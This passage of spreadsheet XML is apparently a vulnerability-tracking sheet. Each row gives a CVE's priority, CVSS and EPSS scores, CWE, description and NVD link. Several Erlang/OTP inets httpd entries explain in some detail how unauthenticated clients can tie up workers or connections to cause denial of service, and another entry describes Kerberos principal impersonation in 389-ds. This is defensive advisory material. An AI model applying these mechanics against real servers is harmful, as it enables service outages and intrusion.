uniqueness constraint enforced on Kerberos principal name attributes in the 389-ds directory server does not properly account for equivalent representations of the same principal name, allowing a user with sufficient LDAP write privileges to create a service principal that impersonates an existing privileged one. This can lead to unauthorized acquisition of Kerberos service tickets for sensitive services, potentially resulting in full domain compromise.</t></is></c><c r="S433" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-13097</t></is></c></row><row r="434"><c r="A434" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B434" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C434" s="5" t="inlineStr"><is><t>CVE-2026-33197</t></is></c><c r="D434" s="5" t="n"><v>8.699999999999999</v></c><c r="E434" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F434" s="5" t="inlineStr"><is><t>biossecurity@ami.com</t></is></c><c r="G434" s="5" t="inlineStr" /><c r="H434" s="5" t="n"><v>0.001</v></c><c r="I434" s="5" t="inlineStr" /><c r="J434" s="5" t="inlineStr" /><c r="K434" s="5" t="inlineStr" /><c r="L434" s="5" t="inlineStr" /><c r="M434" s="5" t="inlineStr" /><c r="N434" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O434" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P434" s="5" t="inlineStr" /><c r="Q434" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="R434" s="5" t="inlineStr"><is><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is></c><c r="S434" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33197</t></is></c></row><row r="435"><c r="A435" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B435" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C435" s="5" t="inlineStr"><is><t>CVE-2026-46636</t></is></c><c r="D435" s="5" t="n"><v>8.699999999999999</v></c><c r="E435" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F435" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G435" s="5" t="inlineStr" /><c r="H435" s="5" t="n"><v>0.004</v></c><c r="I435" s="5" t="inlineStr" /><c r="J435" s="5" t="inlineStr" /><c r="K435" s="5" t="inlineStr" /><c r="L435" s="5" t="inlineStr" /><c r="M435" s="5" t="inlineStr" /><c r="N435" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O435" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P435" s="5" t="inlineStr" /><c r="Q435" s="5" t="inlineStr"><is><t>CWE-1336</t></is></c><c r="R435" s="5" t="inlineStr"><is><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is></c><c r="S435" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-46636</t></is></c></row><row r="436"><c r="A436" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B436" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C436" s="5" t="inlineStr"><is><t>CVE-2026-55250</t></is></c><c r="D436" s="5" t="n"><v>8.699999999999999</v></c><c r="E436" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F436" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G436" s="5" t="inlineStr" /><c r="H436" s="5" t="n"><v>0.006</v></c><c r="I436" s="5" t="inlineStr" /><c r="J436" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K436" s="5" t="inlineStr" /><c r="L436" s="5" t="inlineStr" /><c r="M436" s="5" t="inlineStr" /><c r="N436" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O436" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P436" s="5" t="inlineStr" /><c r="Q436" s="5" t="inlineStr"><is><t>CWE-294, CWE-613, CWE-672</t></is></c><c r="R436" s="5" t="inlineStr"><is><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is></c><c r="S436" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55250</t></is></c></row><row r="437"><c r="A437" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B437" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C437" s="5" t="inlineStr"><is><t>CVE-2026-62384</t></is></c><c r="D437" s="5" t="n"><v>8.699999999999999</v></c><c r="E437" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F437" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G437" s="5" t="inlineStr" /><c r="H437" s="5" t="n"><v>0.006</v></c><c r="I437" s="5" t="inlineStr" /><c r="J437" s="5" t="inlineStr" /><c r="K437" s="5" t="inlineStr" /><c r="L437" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M437" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N437" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O437" s="5" t="inlineStr" /><c r="P437" s="5" t="inlineStr" /><c r="Q437" s="5" t="inlineStr"><is><t>CWE-22, CWE-59</t></is></c><c r="R437"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S437" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62384</t></is></c></row><row r="438"><c r="A438" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B438" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C438" s="5" t="inlineStr"><is><t>CVE-2026-62648</t></is></c><c r="D438" s="5" t="n"><v>8.699999999999999</v></c><c r="E438" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F438" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G438" s="5" t="inlineStr" /><c r="H438" s="5" t="n"><v>0.003</v></c><c r="I438" s="5" t="inlineStr" /><c r="J438" s="5" t="inlineStr" /><c r="K438" s="5" t="inlineStr" /><c r="L438" s="5" t="inlineStr" /><c r="M438" s="5" t="inlineStr" /><c r="N438" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O438" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P438" s="5" t="inlineStr" /><c r="Q438" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R438" s="5" t="inlineStr"><is><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is></c><c r="S438" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62648</t></is></c></row><row r="439"><c r="A439" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B439" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C439" s="5" t="inlineStr"><is><t>CVE-2026-62649</t></is></c><c r="D439" s="5" t="n"><v>8.699999999999999</v></c><c r="E439" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F439" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G439" s="5" t="inlineStr" /><c r="H439" s="5" t="n"><v>0.003</v></c><c r="I439" s="5" t="inlineStr" /><c r="J439" s="5" t="inlineStr" /><c r="K439" s="5" t="inlineStr" /><c r="L439" s="5" t="inlineStr" /><c r="M439" s="5" t="inlineStr" /><c r="N439" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O439" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P439" s="5" t="inlineStr" /><c r="Q439" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R439" s="5" t="inlineStr"><is><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is></c><c r="S439" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62649</t></is></c></row><row r="440"><c r="A440" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B440" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C440" s="5" t="inlineStr"><is><t>CVE-2026-62650</t></is></c><c r="D440" s="5" t="n"><v>8.699999999999999</v></c><c r="E440" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F440" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G440" s="5" t="inlineStr" /><c r="H440" s="5" t="n"><v>0.003</v></c><c r="I440" s="5" t="inlineStr" /><c r="J440" s="5" t="inlineStr" /><c r="K440" s="5" t="inlineStr" /><c r="L440" s="5" t="inlineStr" /><c r="M440" s="5" t="inlineStr" /><c r="N440" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O440" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P440" s="5" t="inlineStr" /><c r="Q440" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="R440" s="5" t="inlineStr"><is><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is></c><c r="S440" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62650</t></is></c></row><row r="441"><c r="A441" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B441" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C441" s="5" t="inlineStr"><is><t>CVE-2026-63312</t></is></c><c r="D441" s="5" t="n"><v>8.699999999999999</v></c><c r="E441" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F441" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G441" s="5" t="inlineStr" /><c r="H441" s="5" t="n"><v>0.006</v></c><c r="I441" s="5" t="inlineStr" /><c r="J441" s="5" t="inlineStr" /><c r="K441" s="5" t="inlineStr" /><c r="L441" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M441" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N441" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O441" s="5" t="inlineStr" /><c r="P441" s="5" t="inlineStr" /><c r="Q441" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R441"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S441" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-63312</t></is></c></row><row r="442"><c r="A442" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B442" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C442" s="5" t="inlineStr"><is><t>CVE-2026-66840</t></is></c><c r="D442" s="5" t="n"><v>8.699999999999999</v></c><c r="E442" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F442" s="5" t="inlineStr"><is><t>vultures@jpcert.or.jp</t></is></c><c r="G442" s="5" t="inlineStr" /><c r="H442" s="5" t="n"><v>0.003</v></c><c r="I442" s="5" t="inlineStr" /><c r="J442" s="5" t="inlineStr" /><c r="K442" s="5" t="inlineStr" /><c r="L442" s="5" t="inlineStr" /><c r="M442" s="5" t="inlineStr" /><c r="N442" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O442" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P442" s="5" t="inlineStr" /><c r="Q442" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="R442" s="5" t="inlineStr"><is><t>XING CPTrans-ME-X contains an Exposure of Sensitive System Information to an Unauthorized Control Sphere (CWE-497). Sensitive system information may be leaked.</t></is></c><c r="S442" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66840</t></is></c></row><row r="443"><c r="A443" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B443" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C443" s="5" t="inlineStr"><is><t>CVE-2026-67281</t></is></c><c r="D443" s="5" t="n"><v>8.699999999999999</v></c><c r="E443" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F443" s="5" t="inlineStr"><is><t>cvd@cert.pl</t></is></c><c r="G443" s="5" t="inlineStr" /><c r="H443" s="5" t="n"><v>0.004</v></c><c r="I443" s="5" t="inlineStr" /><c r="J443" s="5" t="inlineStr" /><c r="K443" s="5" t="inlineStr" /><c r="L443" s="5" t="inlineStr" /><c r="M443" s="5" t="inlineStr" /><c r="N443" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O443" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P443" s="5" t="inlineStr" /><c r="Q443" s="5" t="inlineStr"><is><t>CWE-22, CWE-824</t></is></c><c r="R443" s="5" t="inlineStr"><is><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is></c><c r="S443" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67281</t></is></c></row><row r="444"><c r="A444" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B444" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C444" s="5" t="inlineStr"><is><t>CVE-2026-69664</t></is></c><c r="D444" s="5" t="n"><v>8.699999999999999</v></c><c r="E444" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F444" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G444" s="5" t="inlineStr" /><c r="H444" s="5" t="n"><v>0.007</v></c><c r="I444" s="5" t="inlineStr" /><c r="J444" s="5" t="inlineStr" /><c r="K444" s="5" t="inlineStr" /><c r="L444" s="5" t="inlineStr" /><c r="M444" s="5" t="inlineStr" /><c r="N444" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O444" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P444" s="5" t="inlineStr" /><c r="Q444" s="5" t="inlineStr"><is><t>CWE-772</t></is></c><c r="R444" s="5" t="inlineStr"><is><t>Missing Release of Resource after Effective Lifetime vulnerability in Erlang/OTP inets httpd allows an unauthenticated remote attacker to cause denial of service by sending a request with a chunked body whose chunk-size line is not a hexadecimal number. The worker serving the connection is never released and no timeout reclaims it, so repeating the request across connections occupies every available worker and denies service to legitimate clients. No authentication is required and the default configuration is affected.

The chunk-size line must arrive in a write separate from the headers. When the body accompanies the headers, httpd_request_handler:handle_body/3 calls http_chunk:decode/3 inside a try ... catch throw:Error, so the {error, {chunk_size, _}} thrown by http_chunk:decode_size/4 is answered with 400 Bad Request. When the chunk size arrives later, the decoder is resumed through a bare catch in httpd_request_handler:handle_info/2, which converts the throw into a return value rather than raising it; the resulting error tuple is then treated as the next decoder continuation, the socket is re-armed, and the worker waits for data that never comes. The request timeout has already been cancelled at the point the headers were accepted, and the periodic byte-rate check is only armed when minimum_bytes_per_second is configured, which it is not by default.

This issue affects OTP from OTP 18.1.4 before OTP 27.3.4.17, from OTP 28.0 before OTP 28.5.0.6, and from OTP 29.0 before OTP 29.0.6, corresponding to inets from 6.0.3 before 9.3.2.7, from 9.4 before 9.6.2.3, and from 9.7 before 9.7.2.</t></is></c><c r="S444" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69664</t></is></c></row><row r="445"><c r="A445" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B445" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C445" s="5" t="inlineStr"><is><t>CVE-2026-70399</t></is></c><c r="D445" s="5" t="n"><v>8.699999999999999</v></c><c r="E445" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F445" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G445" s="5" t="inlineStr" /><c r="H445" s="5" t="n"><v>0.005</v></c><c r="I445" s="5" t="inlineStr" /><c r="J445" s="5" t="inlineStr" /><c r="K445" s="5" t="inlineStr" /><c r="L445" s="5" t="inlineStr" /><c r="M445" s="5" t="inlineStr" /><c r="N445" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O445" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P445" s="5" t="inlineStr" /><c r="Q445" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R445" s="5" t="inlineStr"><is><t>Allocation of Resources Without Limits or Throttling vulnerability in Erlang/OTP inets httpd allows an unauthenticated remote attacker to cause denial of service by opening and holding open a large number of connections. The max_clients option is documented to default to 150, and the inets hardening guide presents that limit as the first layer of denial-of-service defence, but a server that does not set it explicitly accepts an unlimited number of simultaneous connections. Establishing the connections is sufficient; no valid request and no authentication are required.

The accept gate in httpd_manager:handle_new_connection/4 reads the option with httpd_util:lookup/2, which returns undefined when the key is absent, rather than the three-argument form carrying the 150 default that the neighbouring get_ustate/2 uses. Erlang term ordering places every integer before every atom, so the Count =&lt; Max guard holds for any connection count and the server never returns {reject, busy}. Each accepted connection occupies a worker process and a socket for as long as it is held, driving the node towards process, memory and file descriptor exhaustion. Servers that set max_clients explicitly are unaffected, because a configured value is applied as intended.

This issue affects OTP from OTP 17.0 before OTP 27.3.4.17, from OTP 28.0 before OTP 28.5.0.6, and from OTP 29.0 before OTP 29.0.6, corresponding to inets from 5.10 before 9.3.2.7, from 9.4 before 9.6.2.3, and from 9.7 before 9.7.2.</t></is></c><c r="S445" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70399</t></is></c></row><row r="446"><c r="A446" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B446" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C446" s="5" t="inlineStr"><is><t>CVE-2026-71380</t></is></c><c r="D446" s="5" t="n"><v>8.699999999999999</v></c><c r="E446" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F446" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G446" s="5" t="inlineStr" /><c r="H446" s="5" t="n"><v>0.004</v></c><c r="I446" s="5" t="inlineStr" /><c r="J446" s="5" t="inlineStr" /><c r="K446" s="5" t="inlineStr" /><c r="L446" s="5" t="inlineStr" /><c r="M446" s="5" t="inlineStr" /><c r="N446" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O446" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P446" s="5" t="inlineStr" /><c r="Q446" s="5" t="inlineStr"><is><t>CWE-772</t></is></c><c r="R446" s="5" t="inlineStr"><is><t>Missing Release of Resource after Effective Lifetime vulnerability in Erlang/OTP inets httpd allows an unauthenticated remote attacker to cause denial of service by sending valid request headers with a large Content-Length and then stalling before the body is complete.

httpd_request_handler:handle_info/2 cancels the request timeout as soon as a parse step succeeds, which includes the headers, and the clause that handles a decoder asking for more data re-arms the socket with {active, once} without setting any further timer. httpd_request:whole_body/2 returns such a continuation whenever the bytes received are fewer than the announced Content-Length, so a well-formed request that stops mid-body leaves the worker waiting indefinitely. The periodic byte-rate check that would reclaim it is armed only when minimum_bytes_per_second is configured, which it is not by default. Repeating this across connections occupies every worker permitted by max_clients and denies service to legitimate clients at negligible bandwidth cost.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446" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71380</t></is></c></row><row r="447"><c r="A447" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B447" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C447" s="5" t="inlineStr"><is><t>CVE-2026-71404</t></is></c><c r="D447" s="5" t="n"><v>8.699999999999999</v></c><c r="E447" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F447" s="5" t="inlineStr"><is><t>meissner@suse.de</t></is></c><c r="G447" s="5" t="inlineStr" /><c r="H447" s="5" t="n"><v>0.003</v></c><c r="I447" s="5" t="inlineStr" /><c r="J447" s="5" t="inlineStr" /><c r="K447" s="5" t="inlineStr" /><c r="L447" s="5" t="inlineStr" /><c r="M447" s="5" t="inlineStr" /><c r="N447" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O447" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P447" s="5" t="inlineStr" /><c r="Q447" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R447" s="5" t="inlineStr"><is><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is></c><c r="S447" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71404</t></is></c></row><row r="448"><c r="A448" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B448" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C448" s="5" t="inlineStr"><is><t>CVE-2026-71981</t></is></c><c r="D448" s="5" t="n"><v>8.699999999999999</v></c><c r="E448" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F448" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G448" s="5" t="inlineStr" /><c r="H448" s="5" t="n"><v>0.006</v></c><c r="I448" s="5" t="inlineStr" /><c r="J448" s="5" t="inlineStr" /><c r="K448" s="5" t="inlineStr" /><c r="L448" s="5" t="inlineStr" /><c r="M448" s="5" t="inlineStr" /><c r="N448" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O448" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P448" s="5" t="inlineStr" /><c r="Q448" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R448" s="5" t="inlineStr"><is><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is></c><c r="S448" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71981</t></is></c></row><row r="449"><c r="A449" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B449" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C449" s="5" t="inlineStr"><is><t>CVE-2026-73314</t></is></c><c r="D449" s="5" t="n"><v>8.699999999999999</v></c><c r="E449" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F449" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G449" s="5" t="inlineStr" /><c r="H449" s="5" t="n"><v>0.005</v></c><c r="I449" s="5" t="inlineStr" /><c r="J449" s="5" t="inlineStr" /><c r="K449" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L449" s="5" t="inlineStr" /><c r="M449" s="5" t="inlineStr" /><c r="N449" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O449" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P449" s="5" t="inlineStr" /><c r="Q449" s="5" t="inlineStr"><is><t>CWE-754</t></is></c><c r="R449" s="5" t="inlineStr"><is><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is></c><c r="S449" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73314</t></is></c></row><row r="450"><c r="A450" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B450" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C450" s="5" t="inlineStr"><is><t>CVE-2026-73316</t></is></c><c r="D450" s="5" t="n"><v>8.699999999999999</v></c><c r="E450" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F450" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G450" s="5" t="inlineStr" /><c r="H450" s="5" t="n"><v>0.002</v></c><c r="I450" s="5" t="inlineStr" /><c r="J450" s="5" t="inlineStr" /><c r="K450" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L450" s="5" t="inlineStr" /><c r="M450" s="5" t="inlineStr" /><c r="N450" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O450" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P450" s="5" t="inlineStr" /><c r="Q450" s="5" t="inlineStr"><is><t>CWE-345</t></is></c><c r="R450" s="5" t="inlineStr"><is><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is></c><c r="S450" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73316</t></is></c></row><row r="451"><c r="A451" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B451" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C451" s="5" t="inlineStr"><is><t>CVE-2026-74835</t></is></c><c r="D451" s="5" t="n"><v>8.699999999999999</v></c><c r="E451" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F451" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G451" s="5" t="inlineStr" /><c r="H451" s="5" t="n"><v>0.003</v></c><c r="I451" s="5" t="inlineStr" /><c r="J451" s="5" t="inlineStr" /><c r="K451" s="5" t="inlineStr" /><c r="L451" s="5" t="inlineStr" /><c r="M451" s="5" t="inlineStr" /><c r="N451" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O451" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P451" s="5" t="inlineStr" /><c r="Q451" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R451" s="5" t="inlineStr"><is><t>The inets application HTTP server httpd fails to enforce a configured body-size limit on chunked request.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451" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74835</t></is></c></row><row r="452"><c r="A452" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B452" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C452" s="5" t="inlineStr"><is><t>CVE-2026-75124</t></is></c><c r="D452" s="5" t="n"><v>8.699999999999999</v></c><c r="E452" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F452" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G452" s="5" t="inlineStr" /><c r="H452" s="5" t="n"><v>0.005</v></c><c r="I452" s="5" t="inlineStr" /><c r="J452" s="5" t="inlineStr" /><c r="K452" s="5" t="inlineStr" /><c r="L452" s="5" t="inlineStr" /><c r="M452" s="5" t="inlineStr" /><c r="N452" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O452" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P452" s="5" t="inlineStr" /><c r="Q452" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="R452" s="5" t="inlineStr"><is><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is></c><c r="S452" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75124</t></is></c></row><row r="453"><c r="A453" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B453" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C453" s="5" t="inlineStr"><is><t>CVE-2026-75133</t></is></c><c r="D453" s="5" t="n"><v>8.699999999999999</v></c><c r="E453" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F453" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G453" s="5" t="inlineStr" /><c r="H453" s="5" t="n"><v>0.003</v></c><c r="I453" s="5" t="inlineStr" /><c r="J453" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K453" s="5" t="inlineStr" /><c r="L453" s="5" t="inlineStr" /><c r="M453" s="5" t="inlineStr" /><c r="N453" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O453" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P453" s="5" t="inlineStr" /><c r="Q453" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R453" s="5" t="inlineStr"><is><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is></c><c r="S453" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75133</t></is></c></row><row r="454"><c r="A454" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B454" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C454" s="5" t="inlineStr"><is><t>CVE-2026-75813</t></is></c><c r="D454" s="5" t="n"><v>8.699999999999999</v></c><c r="E454" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F454" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G454" s="5" t="inlineStr" /><c r="H454" s="5" t="n"><v>0.003</v></c><c r="I454" s="5" t="inlineStr" /><c r="J454" s="5" t="inlineStr" /><c r="K454" s="5" t="inlineStr" /><c r="L454" s="5" t="inlineStr" /><c r="M454" s="5" t="inlineStr" /><c r="N454" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O454" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P454" s="5" t="inlineStr" /><c r="Q454" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R454" s="5" t="inlineStr"><is><t>Certain configuration endpoints may lack proper server-side 
authorization checks, allowing unauthorized users to access or modify 
sensitive device settings. This could result in full compromise of 
device functionality.</t></is></c><c r="S454" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75813</t></is></c></row><row r="455"><c r="A455" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B455" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C455" s="5" t="inlineStr"><is><t>CVE-2026-75960</t></is></c><c r="D455" s="5" t="n"><v>8.699999999999999</v></c><c r="E455" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F455" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G455" s="5" t="inlineStr" /><c r="H455" s="5" t="n"><v>0.004</v></c><c r="I455" s="5" t="inlineStr" /><c r="J455" s="5" t="inlineStr" /><c r="K455" s="5" t="inlineStr" /><c r="L455" s="5" t="inlineStr" /><c r="M455" s="5" t="inlineStr" /><c r="N455" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O455" s="5" t="inlineStr"><is><t>2026-08-26</t></is></c><c r="P455" s="5" t="inlineStr" /><c r="Q455" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="R455" s="5" t="inlineStr"><is><t>Rently Smart Home versions 20.1.0 and prior are vulnerable to an Insufficiently Protected Credentials vulnerability. This could allow an attacker to retrieve pins including the Master Pin, overriding standard user permissions.</t></is></c><c r="S455" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75960</t></is></c></row><row r="456"><c r="A456" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B456" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C456" s="5" t="inlineStr"><is><t>CVE-2026-76224</t></is></c><c r="D456" s="5" t="n"><v>8.699999999999999</v></c><c r="E456" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F456" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G456" s="5" t="inlineStr" /><c r="H456" s="5" t="n"><v>0.006</v></c><c r="I456" s="5" t="inlineStr" /><c r="J456" s="5" t="inlineStr" /><c r="K456" s="5" t="inlineStr" /><c r="L456" 